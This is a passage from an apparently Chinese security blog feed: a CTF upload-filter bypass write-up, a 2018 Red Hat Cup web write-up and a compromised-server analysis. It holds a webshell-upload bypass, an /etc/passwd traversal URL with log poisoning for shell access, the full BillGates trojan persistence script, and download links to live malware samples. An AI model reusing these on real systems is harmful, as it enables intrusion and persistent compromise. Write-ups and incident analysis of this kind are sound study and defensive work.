class="keyword">if</span>(!in_array(strtolower(<span class="variable">$type</span>), <span class="variable">$php_ext</span>)){</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"i need php file"</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="checkContent"><a href="#checkContent" class="headerlink" title="checkContent()"></a>checkContent()</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkContent</span>(<span class="params"><span class="variable">$content</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span> (stripos(<span class="variable">$content</span>, <span class="string">'<?'</span>) === <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="checkExts"><a href="#checkExts" class="headerlink" title="checkExts()"></a>checkExts()</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkExts</span>(<span class="params"><span class="variable">$filename</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$AllowedExt</span> = <span class="keyword">array</span>(<span class="string">'php'</span>, <span class="string">'php3'</span>, <span class="string">'php4'</span>, <span class="string">'php5'</span>, <span class="string">'pht'</span>, <span class="string">'phtml'</span>, <span class="string">'inc'</span>);</span><br><span class="line"> <span class="variable">$filename</span> = explode(<span class="string">'.'</span>, <span class="variable">$filename</span>);</span><br><span class="line"> <span class="keyword">if</span> (in_array(strtolower(<span class="variable">$filename</span>[count(<span class="variable">$filename</span>) - <span class="number">1</span>]), <span class="variable">$AllowedExt</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> <span class="variable">$content</span> = file_get_contents(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>]);</span><br><span class="line"> checkMIME(<span class="variable">$file</span>);</span><br><span class="line"> <span class="keyword">if</span> (checkContent(<span class="variable">$content</span>) && checkExts(<span class="variable">$file</span>[<span class="string">'name'</span>])) {</span><br><span class="line"> upload(<span class="variable">$file</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'attack detected'</span>);</span><br><span class="line"> }</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'file not found'</span>);</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="如何绕过checkMIME-?"><a href="#如何绕过checkMIME-?" class="headerlink" title="如何绕过checkMIME()?"></a>如何绕过<code>checkMIME()</code>?</h2><p>我们先了解下<a href="https://www.leavesongs.com/PENETRATION/XDCTF-2015-WEB2-WRITEUP.html#3mime-type">p牛的博客->mime-type</a></p><p>首先我们上传的文件一定要是php文件,因为<code>checkMIME()</code>的<code>mime_content_type()</code> 检测文件名。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php的fileinfo扩展是通过文件内容来猜测文件的mime type,我们传入的文件,只要前几个字符是<?php,那么就会返回text/x-php</span><br></pre></td></tr></table></figure><p><code>checkContent()</code>检测文件的首次出现的是否为<code><?</code>,如果检测到就会判定是<code>attack</code>。</p><h2 id="如何绕过checkContent-?"><a href="#如何绕过checkContent-?" class="headerlink" title="如何绕过checkContent()?"></a>如何绕过<code>checkContent()</code>?</h2><ul><li>利用windows下的BOM 。</li></ul><p><code>BOM头的文件</code>,文件头3个字符就是\xef\xbb\xbf,就不是<code><?</code>了。</p><p>而fileinfo仍然会判断这个文件是text/x-php,从而绕过<code>checkContent()</code>检测.</p><ul><li>利用<code>#!/usr/bin/php</code> </li></ul><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/php 是告诉操作系统执行这个脚本的时候,调用/usr/bin下的php解释器;</span><br><span class="line"></span><br><span class="line">#!/usr/bin/env php 这种用法是为了防止操作系统用户没有将php装在默认的/usr/bin路径里。当系统看到这一行的时候,首先会到env设置里查找php的安装路径,再调用对应路径下的解释器程序完成操作。</span><br><span class="line"></span><br><span class="line">#!/usr/bin/php 相当写死了php路径;</span><br><span class="line">#!/usr/bin/env php 会去环境设置寻找php目录。</span><br></pre></td></tr></table></figure><h2 id="如何绕过checkExts-?"><a href="#如何绕过checkExts-?" class="headerlink" title="如何绕过checkExts()?"></a>如何绕过<code>checkExts()</code>?</h2><p>在php文件名后加<code>空格</code>,<code>\t</code>,<code>\n</code>,<code>\r</code>,<code>\0</code>,<code>\x0B</code>可绕过<code>checkExts()</code>检测。</p><p>即类似于:<code>filename.php </code>(.php%20)</p><p>在后面的<code>upload()</code>函数里有<code>trim()</code>会去掉空白字符。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">此函数返回字符串 str 去除首尾空白字符后的结果。如果不指定第二个参数,trim() 将去除这些字符:</span><br><span class="line"></span><br><span class="line"> " " (ASCII 32 (0x20)),普通空格符。</span><br><span class="line"> "\t" (ASCII 9 (0x09)),制表符。</span><br><span class="line"> "\n" (ASCII 10 (0x0A)),换行符。</span><br><span class="line"> "\r" (ASCII 13 (0x0D)),回车符。</span><br><span class="line"> "\0" (ASCII 0 (0x00)),空字节符。</span><br><span class="line"> "\x0B" (ASCII 11 (0x0B)),垂直制表符。</span><br></pre></td></tr></table></figure><p>空格<br><img src="/image/1/00.png" alt="空格"></p><p>换行<br><img src="/image/1/n.png" alt="换行"></p><p>空字节符<br><img src="/image/1/0.png" alt="空字节符"></p><p>垂直制表符:<br><img src="/image/1/x0b.png" alt="垂直制表符"></p>]]></content>
<summary type="html"><h1 id="py到出题人的说明:"><a href="#py到出题人的说明:" class="headerlink" title="py到出题人的说明:"></a>py到出题人的说明:</h1><figure class="highlight plaintext"><tabl</summary>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
<category term="php" scheme="https://cr4ckm3.top/tags/php/"/>
</entry>
<entry>
<title>2018红帽杯Web部分wp</title>
<link href="https://cr4ckm3.top/2018/05/01/2018%E7%BA%A2%E5%B8%BD%E6%9D%AF/"/>
<id>https://cr4ckm3.top/2018/05/01/2018%E7%BA%A2%E5%B8%BD%E6%9D%AF/</id>
<published>2018-05-01T00:30:54.000Z</published>
<updated>2019-08-30T10:00:44.733Z</updated>
<content type="html"><![CDATA[<h1 id="Simple-Upload"><a href="#Simple-Upload" class="headerlink" title="Simple Upload"></a>Simple Upload</h1><p>打开首页burp拦截发现<code>admin=0</code>,尝试修改为<code>admin=1</code></p><p><img src="/image/simple_upload/index.png" alt="admin=0"></p><p>然后发现跳转到<code>upload.html</code>页面</p><p><img src="/image/simple_upload/upload.png" alt="upload.html"></p><p>经尝试,只允许上传<code>jpg/png</code>类型文件。以及收集到系统为<code>linux</code>,Web中间件为<code>Apache Tomcat</code>。</p><p>因此大致思路已经清晰:</p><ul><li>apache文件名截断漏洞</li><li>apache解析漏洞</li><li>修改Content-Type</li><li>图片马</li></ul><p>最终可以通过的是修改<code>Content-Type</code>为<code>image/jpeg</code>即可上传任意文件。</p><p>这里有一处比较需要注意的就是,上传的php并没有作用。但需要注意的是,中间件是<code>Apache Tomcat</code>,所以尝试上传jsp大马。</p><p><img src="/image/simple_upload/jsp.png" alt="jsp.png"></p><p>上传成功且解析!</p><p>最终根目录拿到flag</p><p><img src="/image/simple_upload/flag.png" alt="flag.png"></p><h1 id="Shopping-Log"><a href="#Shopping-Log" class="headerlink" title="Shopping Log"></a>Shopping Log</h1><ul><li><code>http://123.59.141.153/</code>或者<code>http://120.132.95.234/</code></li></ul><p>这道题没什么意思,前面几步都是照实验吧上的题来改的,旧题新出,然后最后一步就是MD5爆破+4位订单号爆破,实在是 🐄</p><p>打开一片空白,只有一句注释<code><!-- Site is tmvb.com --></code></p><p>于是终于有机会看到群上面各位大佬的社工了😄</p><p>正确做法:</p><ul><li>修改<code>hosts</code>文件指向<code>www.tmvb.com</code>然后就可以看到:</li></ul><p><img src="/image/shopping_log/index.png" alt="index.png"></p><ul><li>设置 <code>referer:www.dww.com</code> 绕过第一步</li></ul><p><img src="/image/shopping_log/1.png" alt="1.png"></p><ul><li>设置 <code>Accept-Language: ja</code> 绕过第二步</li></ul><p>参考资料:<a href="http://www.lingoes.cn/zh/translator/langcode.htm">Language Code Table</a></p><p><code>Japan sales only</code> 意思差不多就是要来自日本。绕过思路:修改<code>Accept-Language</code>或<code>X-Forwarded-For</code>绕过</p><p><img src="/image/shopping_log/2.png" alt="2.png"></p><ul><li>然后页面会跳转定向到一个订单查询页面</li></ul><p><img src="/image/shopping_log/3.png" alt="3.png"></p><ul><li>4位订单号爆破+MD5验证码爆破</li></ul><p>这一步太坑,最后爆破出的订单号就是<code>9588</code>,队里几个人跑了一下午。。。</p><p><img src="/image/shopping_log/4.png" alt="4.png"></p><p><img src="/image/shopping_log/5.png" alt="5.png"></p><p>脚本的话就不贴了,需要的话在网上也是可以找到的,实在找不到再找我。</p><h1 id="guess-id"><a href="#guess-id" class="headerlink" title="guess id"></a>guess id</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">emmmmmmmmmmm,这道题可能是为了防止大佬ak,所以没人做出来,等官方WP</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="biubiubiu"><a href="#biubiubiu" class="headerlink" title="biubiubiu"></a>biubiubiu</h1><p>听说解出来的大多数都是非预期的做法。<code>文件包含+access.log解析</code>getshell</p><p>然而预期的做法是<code>ssrf+gopher</code></p><p>这道题比较接近实战。</p><p>下面讲下非预期的做法:</p><ul><li>文件包含</li></ul><p><code>http://08f43db931ee48ef984062844dcc216747512e8278834ba7.game.ichunqiu.com/index.php?page=../../../../../../etc/passwd</code></p><ul><li>nginx的access.log日志处可随意构造写入</li></ul><p><code>../../../../../../var/log/nginx/access.log</code></p><p><img src="/image/biubiubiu/UA.png" alt="UA"></p><p><img src="/image/biubiubiu/1.png" alt="1.png"></p><p><img src="/image/biubiubiu/shell.png" alt="shell"></p><ul><li>写的shell,能解析,但是服务器有类似狗之类的防菜刀,师傅都是用的过狗。</li></ul><p>剩下的事就是翻flag</p><p><img src="/image/biubiubiu/flag.png" alt="flag"></p><p>预期做法等官方WP</p>]]></content>
<summary type="html"><h1 id="Simple-Upload"><a href="#Simple-Upload" class="headerlink" title="Simple Upload"></a>Simple Upload</h1><p>打开首页burp拦截发现<code>admin=0<</summary>
<category term="writeup" scheme="https://cr4ckm3.top/tags/writeup/"/>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
</entry>
<entry>
<title>一次被入侵后的服务器的分析</title>
<link href="https://cr4ckm3.top/2018/04/28/BillGates/"/>
<id>https://cr4ckm3.top/2018/04/28/BillGates/</id>
<published>2018-04-28T12:00:00.000Z</published>
<updated>2019-08-30T10:00:42.843Z</updated>
<content type="html"><![CDATA[<h1 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h1><p>早上老大,发来一个任务,说联系下某服务器负责人,看下服务器什么情况。</p><h1 id="经过"><a href="#经过" class="headerlink" title="经过"></a>经过</h1><p>负责人描述:</p><ul><li>发现莫名被创建新用户</li><li>出现异常流量,且达到14个G</li><li>27日三个时间段出现异常ip登录</li><li>对外开放22、80、5001端口</li><li>部分日志丢失</li></ul><p>5001端口为app服务器数据接口</p><h1 id="开始分析"><a href="#开始分析" class="headerlink" title="开始分析"></a>开始分析</h1><p>拿到账号登录进去,首先要明确能做什么和要做什么。<br>随便看了下,部署的网站应用是用root权限<br>查看进程<code>ps -aux</code>发现并没有什么进程运行<br>另外,觉得敲命令运行很卡顿,且常常卡死,掉线。所以<code>top</code>命令查看,发现某进程sysxlv占用104%的cpu,问题很大。<br>询问管理员后,是不属于他们的应用。<br>那么就发现了问题所在。</p><h1 id="进一步寻找"><a href="#进一步寻找" class="headerlink" title="进一步寻找"></a>进一步寻找</h1><p>用黑客的视角与思考方式,假如我是攻击者,我会做些什么维护自己的权限?这也是渗透过程中属于后渗透阶段重要的一部分。<br>如何维权</p><ul><li>留后门</li><li>不死内存马</li><li>定时脚本</li><li>启动任务</li></ul><h1 id="BillGates木马"><a href="#BillGates木马" class="headerlink" title="BillGates木马"></a>BillGates木马</h1><p>发现该脚本是在<code>/etc/rc.d/rc.local</code>文件下有两条自启任务:</p><p><img src="/image/muma/rc.local.jpg" alt="re.local.jpg"></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">touch /var/lock/subsys/<span class="built_in">local</span></span><br><span class="line">sh /etc/jourxlv &</span><br><span class="line"></span><br></pre></td></tr></table></figure><p><code>jourxlv</code>脚本如下:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">#!/bin/bash</span></span><br><span class="line"><span class="comment">#Welcome like-minded friends to come to exchange.</span></span><br><span class="line"><span class="comment">#We are a group of people who have a dream.</span></span><br><span class="line"><span class="comment"># by:sysxlj</span></span><br><span class="line"><span class="comment"># 2016-03-10</span></span><br><span class="line">service iptables stop > /dev/null 2>&1 &</span><br><span class="line">host_dir=`<span class="built_in">pwd</span>`</span><br><span class="line"><span class="keyword">if</span> [ <span class="string">"sh <span class="variable">$host_dir</span>/jourxlv &"</span> = <span class="string">"<span class="subst">$(cat /etc/rc.local | grep $host_dir/jourxlv | grep -v grep)</span>"</span> ]; <span class="keyword">then</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">""</span></span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">"sh <span class="variable">$host_dir</span>/jourxlv &"</span> >> /etc/rc.local</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line">cp sysxlj /usr/bin/aher</span><br><span class="line">cp jourxlv /usr/bin/keudl</span><br><span class="line"><span class="keyword">while</span> [ 1 ]; <span class="keyword">do</span></span><br><span class="line"> Centos_sshd_killn=$(ps aux | grep <span class="string">"<span class="variable">$host_dir</span>/sysxlj"</span> | grep -v grep | wc -l)</span><br><span class="line"> <span class="keyword">if</span> [[ <span class="variable">$Centos_sshd_killn</span> -eq 0 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">if</span> [ ! -f <span class="string">"<span class="variable">$host_dir</span>/sysxlj"</span> ]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">if</span> [ -f <span class="string">"/usr/bin/aher"</span> ]; <span class="keyword">then</span></span><br><span class="line"> cp /usr/bin/aher <span class="variable">$host_dir</span>/sysxlj</span><br><span class="line"> chmod 755 ./sysxlj</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">"No weeget"</span></span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> ./sysxlj &</span><br><span class="line"> <span class="keyword">elif</span> [[ <span class="variable">$Centos_sshd_killn</span> -gt 1 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">for</span> killed <span class="keyword">in</span> $(ps aux | grep <span class="string">"<span class="variable">$host_dir</span>/sysxlj"</span> | grep -v grep | awk <span class="string">'{print $2}'</span>); <span class="keyword">do</span></span><br><span class="line"> Centos_sshd_killn=$((<span class="variable">$Centos_sshd_killn</span>-<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">if</span> [[ <span class="variable">$Centos_sshd_killn</span> -eq 1 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="built_in">continue</span></span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">kill</span> -9 <span class="variable">$killed</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> <span class="keyword">done</span></span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">""</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"> Centos_ssh_killn=$(ps aux | grep <span class="string">"<span class="variable">$host_dir</span>/jourxlv"</span> | grep -v grep | wc -l)</span><br><span class="line"> <span class="keyword">if</span> [[ <span class="variable">$Centos_ssh_killn</span> -eq 0 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">if</span> [ ! -f <span class="string">"<span class="variable">$host_dir</span>/jourxlv"</span> ]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">if</span> [ -f <span class="string">"/usr/bin/keudl"</span> ]; <span class="keyword">then</span></span><br><span class="line"> cp /usr/bin/keudl <span class="variable">$host_dir</span>/jourxlv</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">"No weeget"</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> <span class="variable">$host_dir</span>/jourxlv &</span><br><span class="line"> <span class="keyword">elif</span> [[ <span class="variable">$Centos_ssh_killn</span> -gt 1 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">for</span> killed <span class="keyword">in</span> $(ps aux | grep <span class="string">"<span class="variable">$host_dir</span>/jourxlv"</span> | grep -v grep | awk <span class="string">'{print $2}'</span>); <span class="keyword">do</span></span><br><span class="line"> Centos_ssh_killn=$((<span class="variable">$Centos_ssh_killn</span>-<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">if</span> [[ <span class="variable">$Centos_ssh_killn</span> -eq 1 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="built_in">continue</span></span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">kill</span> -9 <span class="variable">$killed</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> <span class="keyword">done</span></span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">""</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> sleep 600</span><br><span class="line"><span class="keyword">done</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>然后大概初略的看了一下,发现脚本大概操作就是:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">service iptables stop > /dev/null 2>&1 &</span><br><span class="line"><span class="built_in">echo</span> <span class="string">"sh <span class="variable">$host_dir</span>/jourxlv &"</span> >> /etc/rc.local</span><br><span class="line">cp sysxlj /usr/bin/aher</span><br><span class="line">cp jourxlv /usr/bin/keudl</span><br><span class="line">cp /usr/bin/keudl <span class="variable">$host_dir</span>/jourxlv</span><br><span class="line">cp /usr/bin/aher <span class="variable">$host_dir</span>/sysxlj</span><br><span class="line">chmod 755 ./sysxlj</span><br><span class="line"><span class="built_in">kill</span> -9 <span class="variable">$killed</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><ul><li>关闭防火墙</li><li>写自启任务</li><li>木马自我复制</li><li>脚本自我复制</li><li>加权限运行</li><li>kill防止启动多个实例</li></ul><p>所以一看,关防火墙就没什么好事了,就跟着复制目录查看,果然发现<code>aher</code><a href="https://pan.baidu.com/s/12boYMeMA0UckrLxGaVHBqw">百度盘链接 密码:wjbq</a>:ELF开头的linux可执行木马程序 。<code>keudl</code><a href="https://pan.baidu.com/s/12e6H9sk_ksV50mTi6OrMqw">百度盘链接 密码:5yrt</a>:就是上面的脚本。</p><h1 id="木马分析"><a href="#木马分析" class="headerlink" title="木马分析"></a>木马分析</h1><p><code>aher</code>拿到<a href="https://www.virustotal.com/">virustotal</a>上分析:</p><h2 id="Detection"><a href="#Detection" class="headerlink" title="Detection"></a>Detection</h2><p><img src="/image/muma/virustotal.png" alt="virustotal.png"></p><p>多数报木马、后门、DDos,少数报绿色。。。</p><h2 id="Details"><a href="#Details" class="headerlink" title="Details"></a>Details</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Basic Properties:</span><br><span class="line"></span><br><span class="line">MD5:cb49f9c981bd54d9c67770039a02c383</span><br><span class="line">SHA-1:0fee66a1f81e5b924edd593a8f76c9ec424bb668</span><br><span class="line">File Type:ELF</span><br><span class="line">Magic:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped</span><br><span class="line">SSDeep:24576:e845rGHu6gVJKG75oFpA0VWeX4Z2y1q2rJp0:745vRVJKGtSA0VWeoAu9p0</span><br><span class="line">TRiD:ELF Executable and Linkable format (Linux) (50.1%)</span><br><span class="line">ELF Executable and Linkable format (generic) (49.8%)</span><br><span class="line">File Size:1.17 MB</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Tags:</span><br><span class="line"></span><br><span class="line">elf</span><br><span class="line"></span><br><span class="line">History:</span><br><span class="line"></span><br><span class="line">First Seen In The Wild:2010-11-20 23:29:33</span><br><span class="line">First Submission:2018-04-11 18:03:21</span><br><span class="line">Last Submission:2018-04-29 13:26:11</span><br><span class="line">Last Analysis:2018-04-29 13:26:11</span><br><span class="line">File Names:</span><br><span class="line">cb49f9c981bd54d9c67770039a02c383</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="Behavior"><a href="#Behavior" class="headerlink" title="Behavior"></a>Behavior</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br></pre></td><td class="code"><pre><span class="line">Network Communication:</span><br><span class="line"></span><br><span class="line">DNS Resolutions:</span><br><span class="line">fuck999.site</span><br><span class="line"></span><br><span class="line">IP Traffic:</span><br><span class="line"></span><br><span class="line">216.58.203.46:6001 (TCP)</span><br><span class="line">8.8.8.8:53 (UDP)</span><br><span class="line"></span><br><span class="line">File System Actions:</span><br><span class="line"></span><br><span class="line">Files Opened:</span><br><span class="line"></span><br><span class="line">/dev/null</span><br><span class="line">/tmp/gates.lod</span><br><span class="line"></span><br><span class="line">Files Written:</span><br><span class="line"></span><br><span class="line">/tmp/gates.lod</span><br><span class="line"></span><br><span class="line">Process And Service Actions:</span><br><span class="line"></span><br><span class="line">Processes Created:</span><br><span class="line"></span><br><span class="line">/tmp/EB93A6/996E.elf</span><br><span class="line">Processes Terminated</span><br><span 